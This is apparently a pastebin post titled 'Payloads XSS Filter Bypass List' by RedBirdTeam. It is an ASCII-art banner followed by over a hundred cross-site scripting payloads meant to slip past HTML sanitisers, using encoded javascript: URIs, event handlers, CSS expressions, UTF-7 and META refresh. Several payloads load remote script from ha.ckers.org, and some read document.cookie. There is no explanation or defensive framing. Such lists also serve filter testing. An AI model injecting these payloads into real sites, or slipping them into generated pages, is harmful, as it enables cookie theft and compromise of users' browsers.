RedBirdTeam

Payloads XSS Filter Bypass List

Feb 22nd, 2018
  1.  
  2.                   __   __ _____ _____                
  3.                   \ \ / // ____/ ____|                
  4.                    \ V /| (___| (___                  
  5.                     > <  \___ \\___ \       [RedBirdTeam]          
  6.                    / . \ ____) |___) |                
  7.   _____    __     / / \_\_____/_____/   _____   _____
  8.  |  __ \ /\\ \   / / |    / _ \   /\   |  __ \ / ____| <script>alert(/Payloads XSS Filter Bypass List/)</script>
  9.  | |__) /  \\ \_/ /| |   | | | | /  \  | |  | | (___  
  10.  |  ___/ /\ \\   / | |   | | | |/ /\ \ | |  | |\___ \
  11.  | |  / ____ \| |  | |___| |_| / ____ \| |__| |____) |
  12.  |_| /_/    \_\_|  |______\___/_/    \_\_____/|_____/
  13.      [byt3]
  14.                                                      
  15.  
  16. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  17. '';!--"<XSS>=&{()}
  18. 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  19. <script/src=data:,alert()>
  20. <marquee/onstart=alert()>
  21. <video/poster/onerror=alert()>
  22. <isindex/autofocus/onfocus=alert()>
  23. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  24. <IMG SRC="javascript:alert('XSS');">
  25. <IMG SRC=javascript:alert('XSS')>
  26. <IMG SRC=JaVaScRiPt:alert('XSS')>
  27. <IMG SRC=javascript:alert("XSS")>
  28. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  29. <a onmouseover="alert(document.cookie)">xxs link</a>
  30. <a onmouseover=alert(document.cookie)>xxs link</a>
  31. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  32. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  33. <IMG SRC=# onmouseover="alert('xxs')">
  34. <IMG SRC= onmouseover="alert('xxs')">
  35. <IMG onmouseover="alert('xxs')">
  36. <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
  37. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
  38. &#39;&#88;&#83;&#83;&#39;&#41;>
  39. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  40. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  41. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  42. <IMG SRC="jav   ascript:alert('XSS');">
  43. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  44. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  45. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  46. <IMG SRC=" &#14;  javascript:alert('XSS');">
  47. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  48. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  49. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  50. <<SCRIPT>alert("XSS");//<</SCRIPT>
  51. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  52. <SCRIPT SRC=//ha.ckers.org/.j>
  53. <IMG SRC="javascript:alert('XSS')"
  54. <iframe src=http://ha.ckers.org/scriptlet.html <
  55. \";alert('XSS');//
  56. </script><script>alert('XSS');</script>
  57. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  58. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  59. <BODY BACKGROUND="javascript:alert('XSS')">
  60. <IMG DYNSRC="javascript:alert('XSS')">
  61. <IMG LOWSRC="javascript:alert('XSS')">
  62. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  63. <IMG SRC='vbscript:msgbox("XSS")'>
  64. <IMG SRC="livescript:[code]">
  65. <BODY ONLOAD=alert('XSS')>
  66. <BGSOUND SRC="javascript:alert('XSS');">
  67. <BR SIZE="&{alert('XSS')}">
  68. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  69. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  70. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  71. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  72. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  73. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  74. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  75. exp/*<A STYLE='no\xss:noxss("*//*");
  76. xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  77. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  78. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  79. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  80. <XSS STYLE="xss:expression(alert('XSS'))">
  81. <XSS STYLE="behavior: url(xss.htc);">
  82. ¼script¾alert(¢XSS¢)¼/script¾
  83. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  84. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  85. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  86. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  87. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  88. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  89. <TABLE BACKGROUND="javascript:alert('XSS')">
  90. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  91. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  92. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  93. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  94. <DIV STYLE="width: expression(alert('XSS'));">
  95. <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
  96. <BASE HREF="javascript:alert('XSS');//">
  97. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  98. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  99. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  100. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  101. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  102. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  103. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  104. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  105. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  106. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  107. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  108. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  109. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  110. <A HREF="http://66.102.7.147/">XSS</A>
  111. 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  112. veris-->group<svg/onload=alert(/XSS/)//
  113. #"><img src=M onerror=alert('XSS');>
  114. element[attribute='<img src=x onerror=alert('XSS');>
  115. [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
  116. %22;alert%28%27RVRSH3LL_XSS%29//
  117. javascript:alert%281%29;
  118. <w contenteditable id=x onfocus=alert()>
  119. alert;pg("XSS")
  120. <svg/onload=%26%23097lert%26lpar;1337)>
  121. <script>for((i)in(self))eval(i)(1)</script>
  122. <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
  123. <sCR<script>iPt>alert(1)</SCr</script>IPt>
  124. <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>